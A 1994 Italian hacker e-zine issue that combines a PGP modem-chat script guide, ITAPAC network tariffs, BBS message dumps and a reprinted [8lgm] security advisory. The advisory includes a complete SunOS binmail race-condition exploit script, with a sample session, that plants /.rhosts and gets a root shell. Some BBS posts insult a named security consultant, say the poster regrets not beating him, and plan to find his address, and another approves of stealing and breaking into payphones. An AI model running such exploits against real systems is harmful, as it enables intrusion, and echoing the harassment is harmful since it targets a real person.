A MODEM-CHAT FACILITY
WITH PRETTY GOOD PRIVACY
by
Jim Bowery
PGP Win-DOS Chat is a sloppy little facility which allows people
to conduct a rather slow 2-way PGP-encrypted chat via modems.
It requires Telix (the comm program), so if you don't have Telix,
get a copy and make sure you have the "cs.exe" Telix script compiler
with it.
It requires PGP.
You should be familiar with encrypting and decrypting messages with
PGP before you attempt to run this facility. It uses default key
rings and for decryption it uses your default private key.
This has only been tested under Windows NT so if it doesn't work
under a non-preemptive Windows like 3.1, that's probably why.
INSTALLATION
I)
You should probably make sure your PGP "config.txt" file contains
a line that says:
VERBOSE = 0
This is to keep the PGP "noise" messages from interfering with
your chat.
II)
There are 3 script files included below. Follow the directions
for the installation of each of them.
FILE: sendpgp.bat
The following batch file should be placed in your PGP directory
with the name sendpgp.bat.
------------------------- CUT HERE -------------------------
echo off
rem Run this with one argument -- PGP userid of person you are sending to.
rem Be sure to set PGPPASS in environment.
:abc
echo Enter PGP chat message (end with CTRL-Z):
copy con sendpgp.txt
:def
if exist sendpgp.asc goto def
pgp -esa sendpgp.txt %1
del sendpgp.txt
goto abc
------------------------- CUT HERE -------------------------
FILE: recvpgp.bat
The following batch file should be placed in your PGP directory
with the name recvpgp.bat.
------------------------- CUT HERE -------------------------
echo off
rem Receives PGP chat messages. Be sure to set PGPPASS in environment.
:abc
if not exist recvpgp.pgp goto abc
pgp recvpgp.pgp -o recvpgp.txt
type recvpgp.txt
del recvpgp.txt
del recvpgp.pgp
goto abc
------------------------- CUT HERE -------------------------
FILE: pgpchat.slt
The following Telix script should be placed in your Telix directory
with the name pgpchat.slt. If your PGP directory is somewhere
other than "\pgp\" relative to your Telix directory, you will
have to edit "pgpchat.slt" and change all references to the
"\pgp\" path to the path of your PGP directory relative to your
Telix directory.
Then you should execute the command:
C:\telix>cs pgpchat.slt
This will generate a file named "pgpchat.slc" which is your Telix
script executable.
------------------------- CUT HERE -------------------------
main()
{
int t1;
str buf[80];
t1=track("-----END PGP MESSAGE-----",0);
capture("\pgp\recvpgp.asc");
while (1)
{
terminal();
if(track_hit(0) == t1){
capture("*CLOSE*");
frename("\pgp\recvpgp.asc","\pgp\recvpgp.pgp");
capture("\pgp\recvpgp.asc");
}
if(filefind("\pgp\sendpgp.asc",0,buf)){
frename("\pgp\sendpgp.asc","\pgp\sendasc.txt");
type_file("\pgp\sendasc.txt");
fdelete("\pgp\sendasc.txt");
}
delay(10);
}
}
type_file(str fname)
{
int f;
str buf[100];
int ichar, lines_sent = 0;
f = fopen(fname, "r");
if (!f)
return -1;
host_send("^M^J");
while (1)
{
if (fgets(buf, 80, f) == -1)
{
fclose(f);
return 1;
}
host_send(buf);
host_send("^M^J");
terminal();
}
}
//////////////////////////////////////////////////////////////////////////////
host_send(str outstr)
{
cputs(outstr);
}
//////////////////////////////////////////////////////////////////////////////
------------------------- CUT HERE -------------------------
STARTING UP PGP WIN-DOS CHAT
1)
>From the Windows Program Manager, bring up three DOS Prompt windows.
2)
In one window, enter the PGP directory and execute:
C:\pgp>SET PGPPASS=<your pgp pass phrase>
C:\pgp>recvpgp
3)
In another window, enter the PGP directory and execute:
C:\pgp>SET PGPPASS=<your pgp pass phrase>
C:\pgp>sendpgp <userid>
Where <userid> is the PGP userid you would use to encrypt a message
to the person you will be chatting with.
4)
In the third and last window, enter the Telix directory and execute:
C:\telix>telix
5)
To test out your end of the chat system without bothering your friends,
make sure your modem is echoing your commands by typing:
ATZ<cr>
It should echo the "ATZ" on your terminal screen and respond with "OK".
6)
Press ALT-G in Telix and enter "pgpchat" at the prompt to activate
the Telix script.
7)
Activate the "sendpgp.bat" window.
You should see the prompt:
"Enter PGP chat message (end with CTRL-Z):"
8)
Do what the prompt says.
It should then begin encrypting what you typed and return you
to the prompt.
You should then see the Telix window scroll (painfully slowly)
a PGP encryption block.
Sometime later, the "recvpgp.bat" window should display the
same message you entered in the "sendpgp.bat" window.
If so, your end of the system is working.
CAVEAT: You WILL see errors crop up in about 1 in 5 test messages
that you try to send. This is due to the fact that the "self-test"
is using the modem's character echo to simulate the presence of
another user and the modem will, from time to time, see an
"AT" command in the middle of a PGP encyption block. When this
happens, you should see a modem response in the middle of the
PGP encryption block on the Telix screen and PGP error messages
later cropping up on the "recvpgp" screen. Ignore these errors.
9)
Go to the Telix window and press ALT-X to quit Telix.
10)
Reenter Telix, but this time, hold off on executing the
"pgpchat" script.
11)
Dial your friend's modem and make sure you are connected.
12)
Once the modem connection is established with your friend, press
ALT-G in Telix and enter "pgpchat" at the prompt to activate the
Telix script.
13)
Activate the "sendpgp.bat" window and start typing.
You should see your friend's messages pop up in the "recvpgp.bat"
window.
When you are ready to quit, just kill all three DOS windows.
TIPS ON USAGE
I)
Don't send more than about a message per 30 seconds. If you send
faster than that, the PGP data stream might get backed up. The
flow control is there but it is minimal.
II)
You can send text files by the following procedure:
1) Go into Windows' Notepad program and open the file you want to send.
2) Press SHIFT-CONTROL-END to select the entire file.
3) Press CONTROL-INS to copy the file to your clipboard.
4) Reactivate the "sendpgp.bat" window.
5) Press SHIFT-SPACE.
6) Press "e".
7) Press "p".
8) Press CONTROL-Z
This should cause the entire text file to be typed into your
"sendpgp.bat" window, encrypted and sent to your friend.
III)
Your and your friend may have a bit of trouble reading more than
25 lines of text at a time since the "recvpgp.bat" window just
scrolls off the top (its just a DOS window after all). You might
want to run that DOS window under one of the "scroll buffer"
programs that lets you scroll back and see what has scrolled
off the DOS prompt window.
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 14
--------------------------
LE NUOVE TARIFFE DI ITAKAZ
--------------------------
Sembrano convenienti, ma non ancora. Date un'okkiata ... se usata con
parsimonia, una buona NUI affittata potrebbe anche essere "fattibile".
Aggiornato al 31.2.94
X.28 COMMUTATO
==============
Tariffe di Accesso
==================
Canone di abbonamento
menisile L. 12.500
^^^
Modem Multistandard (vedi
listino modem)
Traffico Nazionale
- Tariffa telefonica per il collegamento alla centrale ITAPAC
- per ogni chiamata L. 20
- occupazione porta (per ogni minuto) L. 20
Collegamento su ITAPAC:
- per ogni minuto L. 5,5
- per ogni segmento fino a 200.000 seg./mese
L. 1,2
oltre 200.000 seg./mese
L. 0,7
Riduzioni sul traffico
----------------------
Dalle ore 22 alle ore 7 di ogni giorno, il sabato e i giorni festivi si
applicano le seguenti tariffe ridotte:
- per ogni minuto L. 2
- per ogni segmento fino a 200.000 seg./mese
L. 0,36
oltre 200.000 seg./mese
L. 0,21
Prestazioni opzionali
---------------------
Gruppo Chiuso d'Utente (CUG)
utente responsabile L. 56.000/mese
utente di CUG L. 1.000/mese
Documentazione Addebiti L. 35
per ogni chiamata virtuale
documentata
Modifica NUI (password),
opzioni, parametri L. 50.000
Aggiornato al 1.4.93
TRAFFICO INTERNAZIONALE
=======================
Le tariffe di seguito descritte valgono per ogni tipo di accesso.
Europa e Bacino Paesi Extraeuropei
del Mediterraneo
Tariffa a tempo Tariffa a tempo
--------------- ---------------
fino a 200 ore/mese fino a 200 ore/mese
L. 86,4/min. o fraz. L. 198,018/min. o fraz.
oltre 200 ore/mese oltre 200 ore/mese
L. 60,48/min. o fraz. L. 138,618/min. o fraz.
Traiffa a volume Tariffa a volume
---------------- ----------------
^^^
fino a 200.000 seg./mese fino a 200.000 seg./mese
L. 51,84 / 10 seg. o fraz L. 118,8 / 10 seg. o fraz.
oltre 200.000 seg./mese oltre 200.000 seg./mese
L. 36,288 / 10 seg. o fraz. L. 83,16 / 10 seg. o fraz
Abbiamo anche evidenziato un po' di errori di stampa.
Fonte dell'Informazione :
Info Itakaz, NUA 26100298 (Id Itapac Itapac al login)
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 15
AT
OK
ATD
CONNECT 28.800/VAF/FAN/CULO
E adesso sorbitevi anche queste
=========================================================================
SSSSSS TTTTTTT RRRRR OOOO N N ZZZZZZ AAAA TTTTTTT EEEEEE !!
S T R R O O NN N Z A A T E !!
S T R R O O N N N Z A A T E !!
SSSSS T RRRRR O O N N N Z AAAAAA T EEEEE !!
S T R R O O N N N Z A A T E !!
S T R R O O N NN Z A A T E
SSSSSS T R R OOOO N N ZZZZZZ A A T EEEEEE !!
=========================================================================
________________________________________________________________
A grande richiesta ecco la famosa "mucca che caga" di Sxs!!!!!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
(__) <---- queste sono un paio di corna...
/oo\\________
\\ / \\
\\/ / \\ <---- questa e' la mucca....
\\_|___\\_|/.\\
|| YY| o '
|| || O <---- e questa e' la cacca.....
^^ ^^
Beh, con il tacito permesso di Sxs che ha postato tempo fa questa sua
creazione su Ultimo Impero BBS (Si, proprio loro, quei FOTTUTI COGLIONI della
Redazione di TGM che SPUTTANANO i file .MOD inserendo il loro BANNER DEL CAZZO
rovinando l'intestazione dei moduli e spesso cancellando i nomi dei veri
autori dei suddetti, per mettere invece il nome ed il numero della loro MERDO-
SA BBS DEL CAZZO, che fa cagare mezzo mondo, col suo incasinatissimo CNET che
nessuno ci capisce mai un CAZZO e infatti NON LO USA NESSUNO ...), dicevo, col
permesso di Sxs useremo questa sua meravigliosa creazione come Banner della
nostra rubrichina.
Che non e' necessariamente una rubrica di stronzate, ma un insieme di co-
se prese qua' e la' in vari posti, pervenuteci ai ns indirizzi EMAIL o lette
nei giornali ecc. ecc.
Sta a voi distinguere le EMERITE STRONZATE dalle INFO ELITE dai MSG Di-
vertenti a quel che cazzo volete. Fate un po' voi !!!
Sxs : Se sei contrario a cio' di cui sopra, hai l'indirizzo Email a cui
scrivere ! ;)
Alcuni dei messaggi sono stati "censurati" dalla redazione per evitare
problemi. Se siete contrari a cio', o favorevoli, scriveteci e fateci sapere
cosa ne pensate.
Bene, si comincia !!!!
----------------------
----------------------------------------------------------------------------
Messaggeria Black Jack
(compianta NUA 21124062 :( ora solo da VDT ma non so la pagina)
Area : Sysop
MSG N. 2230 Del: 02-06-94 21:03:02
Di: PhalanX
in nome di una ristretta cerchia di persone che irridono al clericalismo
e che aborriscono chiunque tenti di giustificare l'essenza delle cose in
base a preconcetti mistici, io chiedo formalmente l'apertura di un'area
destinata allo scambio di invettive contro la simbologia (e si badi: solo
essa, e NON i concetti) clericale e religiosa in genere. Mi candido alla
moderazione, ben conscio delle capacita' di moltri altri utenti in materia.
---------------------------------------
Msgr. Arkimede
Area GENERALE
Mitt JOE
Data 28/08/94 02:17:18
Msg#1495 1/1 Object: ore 2.15
Un'altra partenza.
L'estate volge al termine
minuto dopo minuto.
E' forse come svegliarsi da un sogno.
Viva la Guinness.
Le ore piccole e le grandi donne.
Viva me.
Joe
p.s.: chissa' qual'e' la verita'.
---------------------------------------
Decoder BBS
Area: Dibattito CyberPunx
Msg#: 6647 Date: 20 Aug 94 17:33
From: Ice Man Read: Yes Replied: Yes
To: All Mark:
Subj: Ai mie tempi c'era la guerra!
... E voi pensevate ke fosse finita???
da "LA STAMPA" di Sabato 20 Agosto..
Le indagini telematike di uno studente ingaggiato dai giudici di milano
U N D E T E C T I V E D E L C Y B E R S P A Z I O
Cosi' ho katturato i pirati informatici
-> Riporto solo i pezzi piu interessanti...
...Cotrozzi Massimo la vita la passa per meta' a Milano e per meta' nel
suo computer. 12 ore in un posto 12 ore in un altro.
Lo ingaggiano le socita' commerciali per proteggere dalle intrusioni
le loro banke dati, lo ingaggiano i giudiciper skoprire i kolpevoli dei
reati di pirateria informatika.
-> Ok kazzo kuesto mi sempra gia di averlo letto ... solo ke era su un libro
di sterling!!! ma il meglio deve ankora venire!!!
...Massimo Cotrozzi laureato in informatica nove annni poassati a viaggiare
tra terra e cyberspazio a skoprire i segreti della informatica, a capire
come si violano le difese telematike e kome si possono renderle meno
vulnerabili, a interpretare la filosofia degli hacker e kuella dei
crekers.
-> In pratika sto stronzo si e' fatto una 15ina di sistemi ha preso le sue nui
si sara' fatto passae le frekuenze per boxare e un giorno si e' svegliato e
ha detto... Kazzo mi annoi di nuovo!!!!
Ke faccio?? bhe adesso passo dalla parte opposta!!!!!
Te lo diko kon tutto il kuore e spero ke sto messaggio tu lo legga karo il
mio Cotrozzi
S T R O N Z O !
E pregerei tutti a unirsi al mio koro!!!!
Ma riprendiamo l' artikolo!!
"...Io passo molte ore sulle Chat-Line degli hackers.
Ieri sera parlavo con uno ke era al komputer da 36 ore di file ed era gia'
entrato in 12 sistemi.
Seguo unsando uno pseudonimo e collegandomi da un telefono diverso da
kuello registrato le loro konversazioni.
-> Dunke appurato ke sto kui' e' stronzo dalla testa ai piedi prosegiuamo...
Chat-line pirata???????? seee mo han fatto la
144-xxx-xxx _Hacker in linea.
Bho si sapessa al meno spiegare...
E non ho klapito perke' usa un altro telefono ke ha paura ke sulle bbs lo
traccino?
Komunku l'artikolo kontinua ma direi ke ho reso l' idea!!!!! ultima kikka
per finire...
"...Sono (relativo agli hackers NdS) infiltrati dovunkue e io sono
infiltrato tra di loro..."
-> Ekko kon sta frase delle balle da film di 4o ordine finisko il mex.
Il bello e ke sto stronzo ne va' pure fiero di kuello ke ha fatto!!!!!!
Il giudizio hai posteri ma intano la nomina di
STRONZO DEL MILLENIO
mi pare abbia trovato il suo vincitore!!!!
... -**- TURN ON YOUR BRAIN <=--------=> FREE YOUR MIND -**-
-!- Blue Wave/RA v2.12 [NR]
! Origin: ---> ECN_TO +39-11-6507540 <--- (45:1917/2.0)
SEEN-BY: 1/1 5/1 9/1 10/2 30/1 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 1500/1
SEEN-BY: 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1
[ N.d.r. STROOOOOOONZOOOOOOOOOOOO!!!!!!!!!!!!]
==============================================
Msg#: 7468 Date: 02 Sep 94 00:56
From: MainMan Read: Yes Replied: No
To: All Mark:
Subj: News sulla merdaccia... ops, Cotrozzi...
From: mainman@cubalibre.crn.gaia.it (MainMan)
Ciao a tutti!!!
Ho novita` sul faccia di merda... che e` una vecchia conoscenza al Poli a
Milano... e` noto per essere una testa di cazzo, anche grande, oltre che un
idiota colossale... A quanto pare e` totalmente un infame, in quanto ex-hacker
egli stesso, anche se piuttosto LAMA...
Ma il bello deve ancora venire... Forse ricorderete quando il Leonka doveva
andare in via Adriano, che dei gruppetti di teste di cazzo protestavano
animatamente... uno di loro era rimasto lievemente ferito... ecco, era proprio
il "nostro"... peccato non averlo steso quando ce n'era la possibilita`...
Comunque vedo di riuscire ad avere almeno un numero di telefono, se non
addirittura l'indirizzo... ;-)
--
c u l8r
by
Brian
Key fingerprint = 5B 8C 55 64 98 4E AF 64 61 E4 8A 12 2F F7 9B A1
-!- ifmail v.2.4
! Origin: Cyber Rights Now! (65:1400/5@cybernet)
SEEN-BY: 1/1 5/1 9/1 10/2 1000/1 4 1100/1 1200/1 2 5 6 7 1400/1 2 3 4
SEEN-BY: 1400/5 1500/3 1600/1 1800/1 1900/1 2000/1
---------------------------------------
Msgr. Arkimede
Area Lo Sfogatoio
Mitt JOE
Data 20/06/94 20:46:22
Msg_651 1/1 Object: Quando dico certe cose
vorrei crepare di botto.
Non cio' ce ho detto.
Altro. Ancora prima.
---------------------------------------
BBS DECODER
Area: Dibattito CyberPunx
Msg#: 5769 Date: 30 Jul 94 08:28
From: H.P.F.S. Read: Yes Replied: No
To: Fox Lodari Mark:
Subj: Point.Linux
[Fox]
IO SONO DIVENTATO KOSI:
-=@|-#>
ti sembra possibile ridursi kosi`??? A me no !!! Perkui mi devi dare,
prima che mi venga un esaurimento da FACCINE la configurazione del Point per
LinuX, oppure la versione del BT che hai tu modificata per LinuxXX
(acc.. sto diventando proprio nevrastenico, ho smesso di scrive con la K)
Pleeeeeeaaaaaaaaassssssseee!!!!
-!- Acropolis Mailer 0.92
! Origin: LiWixARD.dot.four (65:1100/5.4)
SEEN-BY: 1/1 4/1 5/1 9/1 10/2 999/999 1000/1 4 1100/1 2 5 6 7 1200/1 2
SEEN-BY: 1200/5 6 1400/1 1500/1 1600/1 1800/1 1900/1 2000/1
Msg#: 5784 Date: 01 Aug 94 19:32
From: The creeper Read: Yes Replied: No
To: Spirito libero (e ficcante) Mark:
Subj: Bad smell
A parte la puzza delle tue ascelle marce
si sente anche un vago odore di vorrei ma non posso.
Anzi. Il ficcante contenuto delle tue proposizioni balorde
ha gettato nello sconforto persino il mio cactus
che, gia' sofferente di aerofagia, sta scoppiettando nel vaso,
e, nel delirio dell'estate indiana, cerca un culo in cui
trovare riparo. Forse ti puo' interessare.
Msg#: 5895 Date: 12 Mar 94 17:23
From: Enzo Catania Read: Yes Replied: No
To: Virtualcip Mark:
Subj: Un uomo, una vergogna!
In un messaggio di 31 Jul 94
Virtualcip dicevi a Marco Venturini Autieri:
V> ... Emilio Fede ci ha rotto i coglioni!!!!
Liguori e' riuscito a fracassare anche le briciole! :-)
____ _
/ ( ) 69th Point of ECN
/arro/__ Azzz!
Msg#: 5946 Date: 05 Aug 94 21:09
From: The creeper Read: Yes Replied: No
To: All Mark:
Subj: Holy..days
il g0vern0
va in vaccanza www
no-
in va-c-anza
man-c-anza
e noi in
suddit-anza ci riempiremo la p-anza delle stronzate
concime per poveri
illusi
elettori (sic)
ma, si sa, i maroni estivi non sono meno gonfi di quelli invernali
ALLARME ALLARME! Demagogia( Bugia!
---------------------------------------
----------------------------------------------------------------------------
Introduction to [8lgm] Advisory Releases
----------------------------------------------------------------------------
In the light of the current move towards openness in the discussion of compu-
ter security related matters, the [8lgm] team have decided to release some of
their back catalogue of [8lgm] advisories previously unavailable to outsiders.
Those advisories deemed suitable for publication are known to the relevant or-
ganisations concerned (e.g. CERT). However, these vulnerabilities have not
been given the publicity required so that system administrators can correct
the problem. In most cases, fixes are currently available; please contact
your vendor directly for patch details.
[8lgm] was created in early 1989 by several individuals with a common interest
in computer security. Up until 1991, [8lgm] members actively used vulnerabi-
lities to obtain access to many computer systems world-wide. After this pe-
riod, any results of research have been reported and passed onto vendors. Ho-
wever, this work has been carried out on a limited number of platforms, so
the true extent of any vulnerability is currently unknown.
If the problem described in any advisory is discovered to affect operating sy-
stems not mentioned, please e-mail [8lgm] at 8lgm@bagpuss.demon.co.uk, giving
full details so that this information can be added to the bug database.
Please do not hesitate to contact [8lgm] with any questions related to compu-
ter security. An [8lgm] team member will deal with your enquiry in the stric-
test of confidence, and provide assistance whenever required.
8lgm-bugs@bagpuss.demon.co.uk (To report security flaws)
8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories)
8lgm@bagpuss.demon.co.uk (General enquiries)
This introductory file and the advisories mentioned have been forwarded to the
following newsgroups and mailing lists.
comp.security.unix
INFOHAX <infohax-emergency@stormking.com>
BUGTRAQ <chasin@crimelab.com>
CERT/CC <cert@cert.org>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi138foAAAEEANMr/+dGdcMgmK6p61OjhUVUEnqRBvlX6PZa/1wM1hziNJgV
q/VIkLqYpMUIGRYWs2NS/WgF6N1BldXib2EbZ3MNjR5fYeMnwu2amTfGkkcl9IYQ
t3xj0/g69tPYJvlmcLdDx787b6UlIKT9xF+5Z5pCZp0QEyU/CtKRWea3gAuFAAUR
tCFbOGxnbV0gPDhsZ21AYmFncHVzcy5kZW1vbi5jby51az4=
=ivMN
-----END PGP PUBLIC KEY BLOCK-----
---------------------------------------
From 8lgm@bagpuss.demon.co.uk Fri May 6 22:49:11 EDT 1994
This advisory has been sent to:
comp.security.unix
BUGTRAQ <bugtraq@crimelab.com>
CERT/CC <cert@cert.org>
Sun Microsystems <security-alert@sun.com>
===========================================================================
[8lgm]-Advisory-6.UNIX.mail2.2-May-1994
PROGRAM:
binmail(1) (/usr/bin/mail)
VULNERABLE OS's:
SunOS 4.1.x with Sun's latest binmail patch - 100224-07.
DESCRIPTION:
Sun released a patch 100224-07 to fix the problems described
in [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992. After 5 weeks,
Sun have produced a fix which will defeat our original script,
but the original problem remains, and is now even worse then
the original!
The old race condition still exists in the patched binmail(1),
which allows files to be created in arbitrary places on the
filesystem. These files can be owned by arbitrary (usually
system) users.
A new problem allows 0 length files to be created anywhere in
the filesystem, even without a race.
IMPACT:
Any user with access to binmail(1) can become root.
REPEAT BY:
This example demonstrates how to become root on most affected
machines by creating root's .rhosts file. Please do not do
this unless you have permission.
Note that this script will only create new files, not append
to existing ones (as did the one in the previous advisory).
A variation on this script could easily be written to append
to existing files. On the other hand, you are now virtually
guaranteed to win this race, which is what makes this problem
worse than the original.
Create the following file, 'mailscript2':
8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# Syntax: mailscript2 user target-file rsh-user
#
# This exploits a flaw in SunOS binmail(1), and attempts
# to become the specified 'user', by creating a .rhosts
# file and using rsh.
#
# Written 1994 by [8LGM]
# Please do not use this script without permission.
#
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
PROG="`basename $0`"
SPOOLDIR="/var/spool/mail"
# Check args
if [ $# -ne 3 ]; then
echo "Syntax: $PROG user target-file rsh-user"
exit 1
fi
TARGET="$1"
TARGET_FILE="$2"
RSH_USER="$3"
# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
echo "Sorry, this only works on SunOS"
exit 1
fi
# Check user exists
grep "^$TARGET:" /etc/passwd >/dev/null 2>&1
if [ $? -ne 0 ]; then
echo "$PROG: Warning, $TARGET not in local passwd file"
# We continue though, might be in the YP passwd file
fi
# Check target file
if [ -f $TARGET_FILE ]; then
OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
echo "$PROG: Warning, $TARGET_FILE already exists, cant race with this script"
exit 1
else
OLD_TARGET_LEN=0
fi
# Delete spool file if its a link, and we are able
if [ -h "$SPOOLDIR/$TARGET" ]; then
rm -f "$SPOOLDIR/$TARGET"
# Dont worry about errors, we catch it below
fi
# Check mail file
if [ -f "$SPOOLDIR/$TARGET" ]; then
echo "$PROG: ${TARGET}'s mail file exists."
exit 1
fi
# Make the race program
cat >mailrace.c << 'EOF'
#include <stdio.h>
#include <unistd.h>
main(argc,argv)
int argc;
char *argv[];
{
if (argc != 3) {
fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]);
exit(1);
}
symlink(argv[2], argv[1]);
while(access(argv[2], F_OK));
unlink(argv[1]);
close(creat(argv[1], 0600));
}
EOF
cc -o mailrace mailrace.c
# Check we now have mailrace
if [ ! -x "mailrace" ]; then
echo "$PROG: couldnt compile mailrace.c - check it out"
exit 1
fi
# Start mailrace
RACE_PID=$!
# Send mail to the user
NEW_TARGET_LEN=$OLD_TARGET_LEN
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
echo "Sending mail to $TARGET"
echo "localhost $USER" | /bin/mail $TARGET
sleep 10
kill -STOP $RACE_PID
rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1
if [ -f $SPOOLDIR/$TARGET ]; then
echo "$PROG: Sorry, we lost the race - cant try again."
kill -9 $RACE_PID
exit 1
fi
kill -CONT $RACE_PID
if [ -f "$TARGET_FILE" ]; then
NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
else
NEW_TARGET_LEN=0
fi
if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then
echo "We drew the race that time, trying again"
fi
done
# We won the race
kill -9 $RACE_PID
echo "We won the race, becoming $RSH_USER"
rsh localhost -l $RSH_USER sh -i
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
Check what root users are on the system:
> % grep :0: /etc/passwd
root:*:0:1:Operator:/:/bin/csh
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
+::0:0:::
We choose a user with UID 0, but without a /var/spool/mail/<username> file:
> % ls -l /var/spool/mail/sysdiag
/var/spool/mail/sysdiag not found
Execute mailscript2. The user is sysdiag, the target file is /.rhosts, and
the user to rsh to on success is root:
> % chmod 700 mailscript2
> % ./mailscript2 sysdiag /.rhosts root
Sending mail to sysdiag
kill: process 6268: No such process
kill: process 6268: No such process
kill: process 6268: No such process
We won the race, becoming root
#
DISCUSSION:
This problem exists because /var/spool/mail is rwxrwxrwt. For
a full discussion, see [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992.
The original code, checked the user's mailbox with an lstat(2)
before opening it. This checks that the mailbox is not a link.
Sun's 100224-07 patch does this check after opening the file.
This simply defeat's the script given in the above advisory,
it is NOT a fix for the problem.
We believe that the only correct way to fix this problem
is to make the mail spool directory o-w. Other methods discussed
on c.s.u are not totally secure.
Denial of service attacks are possible, due to /var/spool/mail
being world writeable. For example, creating a link to a users
mailbox would prevent that user from receiving any further mail.
binmail would return mail to sender with the following message:
[...]
----- Transcript of session follows -----
mail: /var/spool/mail/user has more than one link or is a symbolic link
mail: /var/spool/mail/user: cannot append
Mail saved in dead.letter
554 user... Service unavailable
[...]
This problem can only be prevented by adopting a mode 775
or mode 755 mail spool directory.
WORKAROUND & FIX:
1. Contact your vendor for a workable patch.
2. The workaround in [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992
remains valid and is still required.
FEEDBACK AND CONTACT INFORMATION:
8lgm-bugs@bagpuss.demon.co.uk (To report security flaws)
8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories)
8lgm@bagpuss.demon.co.uk (General enquiries)
System Administrators are encouraged to contact us for any
other information they may require about the problems described
in this advisory.
We welcome reports about which platforms this flaw does or does
not exist on.
NB: 8lgm-bugs@bagpuss.demon.co.uk is intended to be used by
people wishing to report which platforms/OS's the bugs in our
advisories are present on. Please do *not* send information on
other bugs to this address - report them to your vendor and/or
comp.security.unix instead.
===========================================================================
--
-----------------------------------------------------------------------
8lgm-bugs@bagpuss.demon.co.uk (To report security flaws)
8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories)
8lgm@bagpuss.demon.co.uk (General enquiries)
---------------------------------------
Area: Dibattito CyberPunx
Msg#: 6345 Date: 07 Aug 94 20:43
From: Captain Swing Read: Yes Replied: No
To: All Mark:
Subj: Sequestro di un cd-noleggio
>una piccola sturiellet estiva...
un mio amico che noleggia(va) cd e' stato colpito da mandato di sequestro
relativamente al noleggio, e fin qui storia risentita mille volte... lui e'
iscritto all'associazione noleggiatori che aveva gia' impugnato la questione a
milano e roma, ecc.. ecc..
ma la gdf non si sarebbe mai aspettata di trovare nel bugigattolo del mio ami-
co anche computer e disketti!! MARONN!!! di corsa dal pm a riferire ed ecco
che il giorno dopo il mandato diventa relativo anche alla detenzione abusiva
di materiale copyright, software sospetto, macchine atte alla duplicazione di
programmi bla bla bla....
si sono ripresentati con tanto di manualetto della BSA che spiega cosa si puo'
fare (niente) e cosa non si puo' fare (tutto), insieme al famigerato disketti-
no trova-(C)...
stavolta la gdf e' andata via molto + contenta, carica dei 3 pc del tizio, un
2000 disks e speranzosa di trovare kissa' cosa negli hd.
ma ahime' il tizio aveva pwdato tutto, e il pur bravo (!) tecnico non riusciva
proprio a crackarle...
no problem: la proposta e' stata :"se ci dai le pw chiudiamo un occhio, senno'
ne apriamo 3!"... ovvia la risposta del tizio, gia' incasinato con storie di
noleggio CD e videogames...
ma oltre al danno la beffa: dopo un mesetto che negli uffici della gdf si
lavorava alacremente alla perquisizione di suddetto materiale, il tizio li va
a trovare per esternare la sua dose settimanale di bestemmie e trova appesi ai
muri dell'ufficio le stampe decorative (cornici, scritte simpatiche, disegni-
ni) che lui realizzava su ordinazione per farsi un po' di pubblicita', smaz-
zandosi come 1 pazzo... "e quelle? " gli fa lui... "ah, niente... le abbiamo
trovate in un giornale..." rispondono...
TE CAPI'?!?!?!? E QUESTA NON E' FRODE? NON E' SFRUTTAMENTO ABUSIVO DELLE
CREAZIONI ARTISTICHE DI UN AUTORE? A LUI I DIRITTI NON SPETTANO? rob de mat..
per farla breve, ora il tizio non puo' lavorare, mentre i figli dei finanzieri
magari stanno distribuendo le suddette stampe agli amici dicendogli "guarda!
tutta la notte ci ho messo, ma guarda che figata!!!"
...sob...
Msg#: 6565 Date: 18 Aug 94 02:33
From: Xxxxxxxx xxxxx Read: Yes Replied: No
To: Captain Swing Mark:
Subj: Re: Sequestro di un cd-noleggio
In article <2e454ab4@p4.f1.n1100.z65.gateway.nervous.com>
Captain.Swing@p4.f1.n1100.z65.gateway.nervous.com (Captain Swing) writes:
>dicendogli "guarda! tutta la notte ci ho messo, ma guarda che figata!!!"
Non e' niente... durante la perquisizione nella mia abitazione in seguito
alla triste storia che noi tutti sappiamo (Fido Bust) i bravi finanzieri
hanno pensato bene di intascarsi due Swatch Crono da collezione...
ho detto INTASCARE non SEQUESTRARE!! I figli di questi bravi finanzieri
si' che saranno contenti, io un po' meno.
Xxxxxxxx
Msg#: 6654 Sent Local Date: 21 Aug 94 12:43
From: Luke Lone Read: Yes Replied: No
To: Igor Tosolini Mark:
Subj: Re: Phrakka la cabina
Vagando nel cyberspazio, Igor Tosolini scrisse a Luke Lone:
IT> ricerchiamo quello che ci e' negato dalla $ip ... mi pare giusto e
IT> doveroso !
Piu` che altro, io seguo questa politica: se il prezzo e` accessibile,
pago, se non lo e`, rubo. E` un comportamento che manda in bestia gli
economisti, perche` scombussola tutte le loro delicate teorie su domanda
e offerta, ma e` molto vantaggioso. ;-)
IT> qua siamo in tanti qualcuno esperto ha fatto delle prove ?
IT> altrimenti dovro' farle io O;-)
Buona fortuna! Guarda che non e` mica facile: e` gia` un problema
togliere le viti arrugginite (se ci sono) che fissano l'intelaiatura
dei telefoni. Forse con piede di porco e fiamma ossidrica.... >-]]]
